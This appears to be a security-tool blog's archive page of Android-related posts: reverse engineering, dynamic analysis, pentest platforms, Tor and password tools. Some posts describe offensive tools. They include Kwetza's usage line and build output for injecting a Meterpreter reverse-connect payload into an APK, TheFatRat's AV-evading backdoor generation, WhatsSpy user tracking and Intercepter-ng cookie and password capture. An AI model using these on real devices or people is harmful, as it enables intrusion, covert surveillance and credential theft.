This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label Android. Show all posts
Showing posts with label Android. Show all posts

kwetza - Python script to inject existing Android applications with a Meterpreter payload

June 07, 2017  , , , , , , ,  


Kwetza is a tool that allows you to infect an existing Android application with a Meterpreter payload.

What does it do?
Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target application's default permissions or inject additional permissions to gain additional functionality.

Getting the code
Firstly get the code:
git clone https://github.com/sensepost/kwetza.git
Kwetza is written in Python and requires BeautifulSoup which can be installed using Pip:
pip install beautifulsoup4
Kwetza requires Apktool to be install and accessible via your PATH. This can be setup using the install instructions located here: https://ibotpeaches.github.io/Apktool/install

Usage
python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
  • nameOfTheApkToInfect.apk =name of the APK you wish to infect.
  • LHOST =IP of your listener.
  • LPORT =Port of your listener.
  • yes =include "yes" to inject additional evil perms into the app, "no" to utilize the default permissions of the app.
python kwetza.py hackme.apk 10.42.0.118 4444 yes
[+] MMMMMM KWETZA
[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.42.0.118
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING COMMS...
[*] ANALYZING ANDROID MANIFEST...
[+] TARGET ACTIVITY: com.foo.moo.gui.MainActivity
[*] INJECTION INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMS TO BE DONE!
[+] TIME TO BUILD INFECTED APK
[*] EXECUTING APKTOOL BUILD COMMAND
[+] BUILD RESULT
############################################
I: Using APktool 2.2.0
I: Checking whether source shas changed...
I: Smaling smali folder into classes.dex
I: Checking whether resources has changed...
I: Building resources...
I: Copying libs ...(/lib)
I: Building apk file...
I: Copying unknown files/dir...
###########################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
###########################################
jar signed.

###########################################

[+] L00t located at hackme/dist/hackme.apk

Information
Kwetza has been developed to work with Python 2.
Kwetza by default will use the template and keystore located in the folder "payload" to inject and sign the infected apk.
If you would like to sign the infected application with your own certificate, generate a new keystore and place it in the "payload" folder and rename to the existing keystore or change the reference in the kwetza.py.
The same can be done for payload templates.
The password for the default keystore is, well, "password".


Read More

Inspeckage - (Android Package Inspector) Dynamic Analysis With Api Hooks, Start Unexported Activities And More

April 27, 2017  , , , , , , ,  


Inspeckage is a tool developed to offer dynamic analysis of Android applications. By applying hooks to functions of the Android API, Inspeckage will help you understand what an Android application is doing at runtime.

Features
With Inspeckage, we can get a good amount of information about the application's behavior:

Information gathering
  • Requested Permissions;
  • App Permissions;
  • Shared Libraries;
  • Exported and Non-exported Activities, Content Providers,Broadcast Receivers and Services;
  • Check if the app is debuggable or not;
  • Version, UID and GIDs;
  • etc.

Hooks (so far)
With the hooks, we can see what the application is doing in real time:
  • Shared Preferences (log and file);
  • Serialization;
  • Crypto;
  • Hashes;
  • SQLite;
  • HTTP (an HTTP proxy tool is still the best alternative);
  • File System;
  • Miscellaneous (Clipboard, URL.Parse());
  • WebView;
  • IPC;
  • + Hooks (add new hooks dynamically)

Actions
With Xposed it's possible to perform actions such as start a unexported activity and much else:
  • Start any activity (exported and unexported);
  • Call any provider (exported and unexported);
  • Disable FLAG_SECURE;
  • SSL uncheck (bypass certificate pinning - JSSE, Apache and okhttp3);
  • Start, stop and restart the application;
  • Replace params and return value (+Hooks tab).

Extras
  • APK Download;
  • View the app's directory tree;
  • Download the app's files;
  • Download the output generated by hooks in text file format;
  • Take a screen capture;
  • Send text to android clipboard.

Configuration
Even though our tool has some hooks to the HTTP libraries, using an external proxy tool is still the best option to analyze the app's traffic. With Inspeckage, you can:
  • Add a proxy to the target app;
  • Enable and disable proxy;
  • Add entries in the arp table.

Logcat
Logcat.html page. A experimental page with websocket to show some information from the logcat.

Installation
Requirements: Xposed Framework

Xposed Installer
  1. Go to Xposed Installer, select "Download"
  2. Refresh and search for "Inspeckage"
  3. Download the latest version and install
  4. Enable it in Xposed
  5. Reboot and enjoy!

Xposed Repository
Get it from Xposed repo: http://repo.xposed.info/module/mobi.acpm.inspeckage 
    adb install mobi.acpm.inspeckage.apk
  1. Enable it in Xposed
  2. Reboot and enjoy!

From Source
Feel free to download the source!

How to uninstall 
    adb uninstall mobi.acpm.inspeckage
And reboot!

Genymotion

Screenshots








Read More

ooniprobe - Measure Internet Censorship & Speed

March 22, 2017  , , , , ,  


Interested in collecting evidence of Internet censorship? Curious about the speed and performance of the network that you are using?

By running the tests in this app, you will examine the following:
  • Blocking of websites 
  • Presence of systems that could be responsible for censorship and/or surveillance
  • Speed and performance of your network

These tests have been developed by the Open Observatory of Network Interference (OONI), a free software project (under The Tor Project) that aims to uncover **Internet censorship** around the world. Since 2012, OONI has collected millions of network measurements across more than 90 countries, shedding light on multiple cases of network interference. By running these tests, you will help increase *transparency* around Internet censorship and network interference around the world.

Collecting evidence of Internet censorship.

OONI's web connectivity test is designed to examine whether websites are blocked and if so, how. This test, in particular, attempts to determine whether access to sites is blocked through DNS tampering, TCP/IP blocking, or by a transparent HTTP proxy. By knowing how access to sites is interfered with, you can more easily evaluate how to circumvent that specific type of censorship. As OONI is committed to transparency through the publication of all network measurement data, you can use it as evidence of any censorship events that you come across.



Detecting systems responsible for censorship and surveillance.


Various types of proxy technologies are used in networks for implementing censorship, surveillance, and traffic manipulation. OONI's HTTP invalid request line test is designed to uncover the presence of such systems within tested networks. However, it's important to point out that not all systems that you might find are necessarily responsible for censorship and/or surveillance! Many proxy technologies, for example, are used in networks for caching purposes.

Measuring the speed and performance of your network.

Sometimes the network that we are using doesn't work as well as we'd like it to. OONI's implementation of the Network Diagnostic Test (NDT) attempts to measure the speed of your network by connecting to mLab servers near you and by subsequently uploading and downloading random data. In doing so, NDT collects low level TCP/IP information that can help characterize the speed and performance of your network. Such information can also be useful in examining cases of throttling.

Open data.

OONI publishes all network measurement data that it collects and processes because open data allows third parties to conduct independent studies, to verify OONI findings and/or to answer other research questions. Such data also helps increase transparency around Internet censorship and various forms of network interference. All data is published on OONI Explorer: https://explorer.ooni.torproject.org/.



Free software.

All OONI tests, as well as its NDT implementation, are based on free and open source software. You can find the source code through the following link:

Attention. Running ooniprobe might be against the terms of service of your ISP or legally questionable in your country. By running ooniprobe you will connect to web services which may be banned, and use web censorship circumvention methods such as Tor. The OONI project will publish data submitted by probes, possibly including your IP address or other identifying information. In addition, your use of ooniprobe will be clear to anyone who has access to your computer, and to anyone who can monitor your Internet connection (such as your employer, ISP or government).

Screenshots


Download ooniprobe (Android)

Download ooniprobe (IOs)

Read More

TheFatRat v1.8 - Easy Tool For Generate Backdoor with Msfvenom

February 14, 2017  , , , , , , , , , , , , , , , ,  


What is TheFatRat ??

An easy tool to generate backdoor with msfvenom (a part from metasploit framework) and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection .



Automating metasploit functions
  • Checks for metasploit service and starts if not present
  • Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
  • Start multiple meterpreter reverse_tcp listners
  • Fast Search in searchsploit
  • Bypass AV
  • File pumper
  • Create backdoor with another techniq
  • Autorunscript for listeners ( easy to use )
  • Drop into Msfconsole
  • Some other fun stuff :)

Autorun Backdoor
  • Autorun work if the victim disabled uac ( user acces control ) or low uac ( WINDOWS )
  • What is uac ? you can visit ( http://www.digitalcitizen.life/uac-why-you-should-never-turn-it-off )
  • I have also created 3 AutoRun files
  • Simply copy these files to a CD or USB
  • You can change the icon autorun file or exe in folder icon ( replace your another ico and replace name with autorun.ico )

HOW CHANGE THE ICONS ?
  • Copy your icon picture to folder /TheFatrat/icons
  • Change the name into autorun.ico
  • And Replace
  • Done

Changelog
Be sure to check out the [Changelog] and Read CHANGELOG.md

Getting Started
  1. git clone https://github.com/Screetsec/TheFatRat.git
  2. cd TheFatRat/setup
  3. chmod +x setup.sh && ./setup.sh

How it works
  • Extract The lalin-master to your home or another folder
  • chmod +x fatrat
  • chmod +x powerfull.sh
  • And run the tools ( ./fatrat )
  • Easy to Use just input your number

Requirements
  • A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux )
  • Must install metasploit framework

READ
  • if prog.c file to large when create backdoor with powerfull.sh , you can use prog.c.backup and create another backup when you running option 2

Tutorial ?

BUG ?
  • Submit new issue
  • pm me
  • Hey sup ? do you want ask about all my tools ? you can join me in telegram.me/offscreetsec

:octocat: Credits


Read More

AppUse - Android Pentest Platform Unified Standalone Environment

February 12, 2015  , , ,  

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) system, a platform for mobile application security testing in the android environment, and it includes unique custom-made tools.

Faster & More Powerful

The system is a blessing to security teams, who from now on can easily perform security tests on Android applications. It was created as a virtual machine targeted for penetration testing teams who are interested in a convenient, personalized platform for android application security testing, for catching security problems and analysis of the application traffic.

Now, in order to test Android applications, all you will need is to download AppUse Virtual Machine, activate it, load your application and test it.


Easy to Use

There is no need for installation of simulators and testing tools, no need for SSL certificates of the proxy software, everything comes straight out of the box pre-installed and configured for an ideal user experience.

Security experts who have seen the machine were very excited, calling it the next ‘BackTrack’ (a famous system for testing security problems), specifically adjusted for Android application security testing.

AppUse VM closes gaps in the world of security, now there is a special and customized testing environment for Android applications; an environment like this has not been available until today, certainly not with the rich format offered today by AppUse VM.

This machine is intended for the daily use of security testers everywhere for Android applications, and is a must-have tool for any security person.

We at AppSec Labs do not stagnate, specifically at a time in which so many cyber attacks take place, we consider it our duty to assist the public and enable quick and effective security testing.

As a part of AppSec Labs’ policy to promote application security in general, and specifically mobile application security, AppUse is offered as a free download on our website, in order to share the knowledge, experience and investment with the data security community.

Features
  • New Application Data Section
  •  Tree-view of the application’s folder/file structure
  •  Ability to pull files
  •  Ability to view files
  •  Ability to edit files
  •  Ability to extract databases
  •  Dynamic proxy managed via the Dashboard
  •  New application-reversing features
  •  Updated ReFrameworker tool
  •  Dynamic indicator for Android device status
  •  Bugs and functionality fixes

Read More

WhatsSpy - Trace the moves of a WhatsApp user

February 09, 2015  , , , ,  


WhatsSpy Public is an web-oriented application that tracks every move of whoever you like to follow. This application is setup as an Proof of Concept that Whatsapp is broken in terms of privacy. Once you've setup this application you can track users that you want to follow on Whatsapp. Once it's running it keeps track of the following activities:
  • Online/Offline status (even with privacy options set to "nobody")
  • Profile pictures
  • Privacy settings
  • Status messages
I made this project for you to realise how broken the privacy options actually are. It just started out as experimenting with Whatsapp to build an Bot, but I was stunned when I realised someone could abuse this "online" feauture of Whatsapp to track anyone. I could just say this in like a blog article (like I tried but got marked as spam) that the privacy options are broken, but you wouldnt realise the impact it actually has.

Requirements

Shortlist requirements:
  • Secondary Whatsapp account (phonenumber that doesn't use Whatsapp)
  • Rooted Android phone OR Jailbroken iPhone OR PHP knowledge
  • Server/RPi that runs 24/7
  • Nginx or Apache with PHP with PDO (php5-pgsql installed) (you can't host on simple webhoster, you need bash)
  • Postgresql

Notice

WhatsSpy Public requires an secondary Whatsapp account. Once the tracker is started, you will not be able to recieve any messages over Whatsapp for this phonenumber. You can either try to register an non-Whatsapp used phonenumber with for example this script or just buy an 5 euro SIM Card and use this phonenumber for the tracker.

For the tracker to work you need an secret which is retrieved from either your Phone or the register script mentioned above. In case of phone registration you need an jailbroken iPhone or rooted Android device in order to retrieve the secret.
  • Jailbroken iPhone users: You can retrieve using this script.
  • Rooted Android phones can use the following APK to retrieve the secret.
In order to retrieve the scecret you need to follow these steps:
  • Insert your (new) secondary SIM card in your phone and boot it up.
  • Re-install Whatsapp on your phone and activate it using the new phonenumber.
  • Use either the APK (Android) or the script (iPhone) to retrieve the WhatsApp secret. Write this secret down, which is required later.
  • Insert your normal SIM card and re-install WhatsApp for normal use.


Read More

JADX - Java source code from Android Dex and Apk files

January 31, 2015  , , , , , , ,  


Command line and GUI tools for produce Java source code from Android Dex and Apk files.

Usage

jadx[-gui] [options] <input file> (.dex, .apk, .jar or .class)
options:
 -d, --output-dir    - output directory
 -j, --threads-count - processing threads count
 -f, --fallback      - make simple dump (using goto instead of 'if', 'for', etc)
     --cfg           - save methods control flow graph to dot file
     --raw-cfg       - save methods control flow graph (use raw instructions)
 -v, --verbose       - verbose output
 -h, --help          - print this help
Example:
 jadx -d out classes.dex


Read More

Appie - Android Pentesting Portable Integrated Environment

January 28, 2015  , , , , , , ,  


Appie is a software package that has been pre-configured to function as an Android Pentesting Environment.It is completely portable and can be carried on USB stick.This is a one stop answer for all the tools needed in Android Application Security Assessment.

Difference between Appie and existing environments ?
  • Tools contained in Appie are running on host machine instead of running on virtual machine.
  • Less Space Needed(Only 600MB compared to atleast 8GB of Virual Machine)
  • As the name suggests it is completely Portable i.e it can be carried on USB Stick or on your own smartphone and your pentesting environment will go wherever you go without any differences.
  • Awesome Interface

Which tools are included in Appie ?

Read More

Kali Linux NetHunter - Android penetration testing platform

January 07, 2015  , , , , , , ,  


NetHunter is a Android penetration testing platform for Nexus and OnePlus devices built on top of Kali Linux, which includes some special and unique features. Of course, you have all the usual Kali tools in NetHunter as well as the ability to get a full VNC session from your phone to a graphical Kali chroot, however the strength of NetHunter does not end there.

We’ve incorporated some amazing features into the NetHunter OS which are both powerful and unique. From pre-programmed HID Keyboard (Teensy) attacks, to BadUSB Man In The Middle attacks, to one-click MANA Evil Access Point setups. And yes, NetHunter natively supports wireless 802.11 frame injection with a variety of supported USB NICs. NetHunter is still in its infancy and we are looking forward to seeing this project and community grow.


Supported Devices
The Kali NetHunter image is currently compatible with the following Nexus and OnePlus devices:
  • Nexus 4 (GSM) - “mako”
  • Nexus 5 (GSM/LTE) - “hammerhead”
  • Nexus 7 [2012] (Wi-Fi) - “nakasi”
  • Nexus 7 [2012] (Mobile) - “nakasig”
  • Nexus 7 [2013] (Wi-Fi) - “razor”
  • Nexus 7 [2013] (Mobile) - “razorg”
  • Nexus 10 (Tablet) - “mantaray”
  • OnePlus One 16 GB - “bacon”
  • OnePlus One 64 GB - “bacon”

Important Concepts
  • Kali NetHunter runs within a chroot environment on the Android device so, for example, if you start an SSH server via an Android application, your SSH connection would connect to Android and not Kali Linux. This applies to all network services.
  • When configuring payloads, the IP address field is the IP address of the system where you want the shell to return to. Depending on your scenario, you may want this address to be something other than the NetHunter.
  • Due to the fact that the Android device is rooted, Kali NetHunter has access to all hardware, allowing you to connect USB devices such as wireless NICs directly to Kali using an OTG cable.

Read More

Nipper - Toolkit Web Scan for Android

January 06, 2015  , , , , , , , , ,  


La Primera herramienta de escáner de vulnerabilidades WEB, En entorno Android (Versión para iOS en desarrollo), este escáner de vulnerabilidad fue enfocado para CMS más usadas, (WordPress, Drupal, Joomla. Blogger ).

En su primera versión Nipper cuenta con 10 módulos distintos, para recopilar información acerca de un URL en específica.

Su interfaz ha sido pensada para que tan solo con unos “toques” en su interfaz extraerías gran parte de su información.

Módulos Disponibles:
  • IP Server
  • CMS Detect & Version
  • DNS Lookup
  • Nmap ports IP SERVER
  • Enumeration Users
  • Enumeration Plugins
  • Find Exploit Core CMS
  • Find Exploit DB
  • CloudFlare Resolver
Nipper NO requiere ROOT, tan solo requiere permiso a internet.
Compatible desde 2.3 a Android L.


Read More

Android Studio - The official Android IDE

December 12, 2014  , , , , , , ,  


Android Studio is the official IDE for Android application development, based on IntelliJ IDEA. On top of the capabilities you expect from IntelliJ, Android Studio offers:
  • Flexible Gradle-based build system
  • Build variants and multiple apk file generation
  • Code templates to help you build common app features
  • Rich layout editor with support for drag and drop theme editing
  • Lint tools to catch performance, usability, version compatibility, and other problems
  • ProGuard and app-signing capabilities
  • Built-in support for Google Cloud Platform, making it easy to integrate Google Cloud Messaging and App Engine
  • And much more

Intelligent code editor
At the core of Android Studio is an intelligent code editor capable of advanced code completion, refactoring, and code analysis.
The powerful code editor helps you be a more productive Android app developer.

Code templates and GitHub integration
New project wizards make it easier than ever to start a new project.
Start projects using template code for patterns such as navigation drawer and view pagers, and even import Google code samples from GitHub.

Multi-screen app development
Build apps for Android phones, tablets, Android Wear, Android TV, Android Auto and Google Glass.
With the new Android Project View and module support in Android Studio, it's easier to manage app projects and resources.

Virtual devices for all shapes and sizes
Android Studio comes pre-configured with an optimized emulator image.
The updated and streamlined Virtual Device Manager provides pre-defined device profiles for common Android devices.

Android builds evolved, with Gradle
Create multiple APKs for your Android app with different features using the same project.
Manage app dependencies with Maven.
Build APKs from Android Studio or the command line.


Read More

zANTI 2.0 - Android Network Toolkit

December 05, 2014  , , , , , , ,  


zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network.

Scan

Uncover authentication, backdoor, and brute-force attacks, DNS and protocol-specific attacks and rogue access points using a comprehensive range of full customizable network reconnaissance scans.

Diagnose

Enable Security Officers to easily evaluate an organization’s network and automatically diagnose vulnerabilities within mobile devices or web sites using a host of penetration tests including, man-in-the-Middle (MITM), password cracking and metasploit.

Report

Highlight security gaps in your existing network and mobile defenses and report the results with advanced cloud-based reporting through zConsole. zANTI mirrors the methods a cyber-attacker can use to identify security holes within your network. Dash-board reporting enables businesses to see the risks and take appropriate corrective actions to fix critical security issues.


Read More

Radare - The Reverse Engineering Framework

November 13, 2014  , , , , , , , , ,  


r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files
This is the rewrite of radare (1.x branch) to provide a framework with a set of libraries and programs to work with binary data.

Radare project started as a forensics tool, an scriptable commandline hexadecimal editor able to open disk files, but later support for analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, ..

radare2 is portable.

Architectures:
6502, 8051, arm, arc, avr, bf, tms320 (c54x, c55x, c55+), gameboy csr, dcpu16, dalvik, i8080, mips, m68k, mips, msil, snes, nios II, sh, sparc, rar, powerpc, i386, x86-64, H8/300, malbolge, T8200

File Formats:
bios, dex, elf, elf64, filesystem, java, fatmach0, mach0, mach0-64, MZ, PE, PE+, TE, COFF, plan9, bios, dyldcache, Gameboy and Nintendo DS ROMs

Operating Systems:
Android, GNU/Linux, [Net|Free|Open]BSD, iOS, OSX, QNX, w32, w64, Solaris, Haiku, FirefoxOS

Bindings:
Vala/Genie, Python (2, 3), NodeJS, LUA, Go, Perl, Guile, php5, newlisp, Ruby, Java, OCAM

Features:
  • Multi-architecture and multi-platform
    • GNU/Linux, Android, *BSD, OSX, iPhoneOS, Windows{32,64} and Solaris
    • i8080, 8051, x86{16,32,64}, avr, arc{4,compact}, arm{thumb,neon,aarch64}, c55x+, dalvik, ebc, gb, java, sparc, mips, nios2, powerpc, whitespace, brainfuck, malbolge, z80, psosvm, m68k, msil, sh, snes, gb, dcpu16, csr, arc
    • pe{32,64}, te, [fat]mach0{32,64}, elf{32,64}, bios/uefi, dex and java classes
  • Highly scriptable
    • Vala, Go, Python, Guile, Ruby, Perl, Lua, Java, JavaScript, sh, ..
    • batch mode and native plugins with full internal API access
    • native scripting based in mnemonic commands and macros
  • Hexadecimal editor
    • 64bit offset support with virtual addressing and section maps
    • Assemble and disassemble from/to many architectures
    • colorizes opcodes, bytes and debug register changes
    • print data in various formats (int, float, disasm, timestamp, ..)
    • search multiple patterns or keywords with binary mask support
    • checksumming and data analysis of byte blocks
  • IO is wrapped
    • support Files, disks, processes and streams
    • virtual addressing with sections and multiple file mapping
    • handles gdb:// and rap:// remote protocols
  • Filesystems support
    • allows to mount ext2, vfat, ntfs, and many others
    • support partition types (gpt, msdos, ..)
  • Debugger support
    • gdb remote and brainfuck debugger support
    • software and hardware breakpoints
    • tracing and logging facilities
  • Diffing between two functions or binaries
  • Code analysis at opcode, basicblock, function levels
    • embedded simple virtual machine to emulate code
    • keep track of code and data references
    • function calls and syscall decompilation
    • function description, comments and library signatures

Read More

Drozer - The Leading Security Assessment Framework for Android

September 29, 2014  , , , , ,  


drozer is a comprehensive security audit and attack framework for Android.

With increasing pressure to support mobile working, the ingress of Android into the enterprise is gathering momentum. Have you considered the threat posed by the Android app that supports your business function, or Android devices being used as part of your BYOD strategy?

drozer helps to provide confidence that Android apps and devices being developed by, or deployed across, your organisation do not pose an unacceptable level of risk. By allowing you to interact with the Dalvik VM, other apps’ IPC endpoints and the underlying OS.

drozer provides tools to help you use and share public exploits for Android. For remote exploits, it can generate shellcode to help you to deploy the drozer Agent as a remote administrator tool, with maximum leverage on the device.

Faster Android Security Assessments

drozer helps to reduce the time taken for Android security assessments by automating the tedious and time-consuming.
  • Discover and interact with the attack surface exposed by Android apps.
  • Execute dynamic Java-code on a device, to avoid the need to compile and install small test scripts.

Test against Real Android Devices

drozer runs both in Android emulators and on real devices. It does not require USB debugging or other development features to be enabled; so you can perform assessments on devices in their production state to get better results.

Automate and Extend

drozer can be easily extended with additional modules to find, test and exploit other weaknesses; this, combined with scripting possibilities, helps you to automate regression testing for security issues.

Test your Exposure to Public Exploits

drozer provides point-and-go implementations of many public Android exploits. You can use these to identify vulnerable devices in your organisation, and to understand the risk that these pose.


Read More

zAnti - Android Penetration Testing Toolkit (Free!)

September 03, 2014  , , , , , ,  


zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

zANTI offers a comprehensive range of fully customizable scans to reveal everything from authentication, backdoor and brute-force attempts to database, DNS and protocol-specific attacks – including rogue access points.

zANTI produces an Automated Network Map that shows any vulnerabilities of a given target.

Pick your audit

zANTI offers a host of penetration-testing features, including everything from Man-In-The-Middle and password complexity audits to port monitoring and a sophisticated packet sniffer.

End the discussion

zANTI employs advanced cloud-based reporting that makes it easy to demonstrate flaws and rationalize budgeting for necessary network upgrades.

Keep it simple

zANTI offers a user-friendly web-based interface that turns complex audits into a walk in the park; to quote Forbes, it’s “as polished as a video game”.


Read More

Passera - Tool to generate strong unique passwords for each website

August 19, 2014  , , , , , , ,  



A simple tool that allows users to have strong unique passwords for each website, without the need to store them either locally or with an online service. It is available as a command-line tool for Linux/Mac/Windows and an Android app.

Passera turns any entered text into a strong password up to 64 characters long and copies it to clipboard. Figure out a decent system for yourself that will allow unique passphrases for every website, such as combining website name/URL with a phrase that you would not forget. To login, fire up Passera and enter the passphrase you chose and your real password will be copied to clipboard.

Turn 
githubPasswd123
into 
dpu7{Lrby(vQLd8m

This software is for privacy-aware people who understand the need to have strong unique passwords for each website, yet don't want to use any password managing software or services. Relying on password managing software means trusting your passwords to be kept safe by a third-party company, or trusting them to a single file on your disk.


To make it somewhat more conspicuous, when you start Passera it copies a random password to clipboard. The real password is then only stored in clipboard for 10 seconds, before being overwritten by another random string.

Password security considerations

Passera is not designed to produce a hash of a given string by reinventing the wheel of cryptography. Instead, it produces a unique string of specified length, suitable for usage as a strong password. The cryptographic methods used are ensuring that the produced passwords are as "random" as possible, and are absolutely impossible to trace back to original passphrases.

Passwords, produced by Passera are impossible to brute-force, since it would take an extremely long time (as opposed to using combinations of real words and sentences as passwords). If a password gets leaked from a compromised website, an attacker would not be able to determine any of your other passwords. And if the attacker is aware that Passera has been used to create the password, brute-forcing with intent to find out the original passphrase would also take an extremely long time.

Passera does not ask for a website URL or a "master password" when generating a password, because these values would be included into the hashing algorithm in a particular way, potentially known to an attacker. Instead, users have the freedom to combine anything in any order, shape or form in the initial passphrase, making it exponentially more difficult to brute-force, to the point of being impossible.



Read More

aNmap - Android Network Mapper (Nmap for Android)

July 23, 2014  , , , , , ,  


Nmap is one of the most improtant tools for every cracker (white, grey black hat "hacker"). Nmap is a legendary hack tool and probably the prevelent networt security port scanner tool over the last 10 years on all major Operating Systems. So far it was available in windows, linux and Mac OS X. But now its available at android platform too. It is compiled from real Nmap source code by some developers to provide the support for android devices.

Read More

Hooker - Automated Dynamic Analysis of Android Applications

June 14, 2014  , ,  


Hooker is an opensource project for dynamic analysis of Android applications. This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application. It leverages Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...) in an elasticsearch database. A set of python scripts can be used to automatize the execution of an analysis in order to collect any API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:
  1. APK-instrumenter is an Android application that must be installed prior to the analysis on an Android device (for instance, an emulator).
  2. hooker_xp is a python tool that can be use to control the android device and trigger the installation and stimulation of an application on it.
  3. hooker_analysis is a python script that can be use to collect results stored in the elasticsearch database.
  4. tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact informations.
  5. tools/apk_retriever is a Python tool that can be use to download APKs from various online public Android markets.
  6. tools/emulatorCreator is a script that can be use to prepare an emulator.

Read More

[Intercepter-ng] Sniffer de Red con SSLstrip para Android

January 22, 2014  , , , , ,  


Intercepter-NG es una aplicación que nos permitirá capturas el tráfico de datos en la red local a la que estemos conectados. Esta herramienta tiene la funcionalidad de analizador de protocolos al más puro estilo Wireshark aunque con muchísimas menos opciones. Con Intercepter-ng podremos ver cookies de las diferentes conexiones que se realicen así como realizar ataques contra SSL con SSLStrip.

En RedesZone tenéis un completo manual de utilización de SSLstrip y cómo funciona exactamente para “descifrar” el tráfico SSL. La aplicación tiene varias pestañas para elegir el objetivo, iniciar el analizador de paquetes y ver todo el tráfico en detalle y también las cookies de las páginas web que la víctima ha visitado.
Lo primero que debemos hacer con esta aplicación es pulsar en el radar para escanear los posibles objetivos, una vez seleccionado el objetivo nos movemos por las pestañas para ir viendo las diferentes opciones que nos brinda esta aplicación.

Alguna de las utilidades es que nos permite recuperar la contraseña y los archivos que se transmitan en la red que estamos analizando.

Los requisitos que necesita esta aplicación son los siguientes:
  • Android 2.3.3 o superior
  • Ser root
  • Tener instalado Busybox

Read More

[Orbot] Mobile Anonymity + Circumvention

January 07, 2014  , , , , ,  



Orbot is a free proxy app that empowers other apps to use the internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is free software and an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis.

Orbot is the only app that creates a truly private internet connection. As the New York Times writes, “when a communication arrives from Tor, you can never know where or whom it’s from.” Tor won the 2012 Electronic Frontier Foundation (EFF) Pioneer Award.

Read More
Subscribe to: Posts (Atom)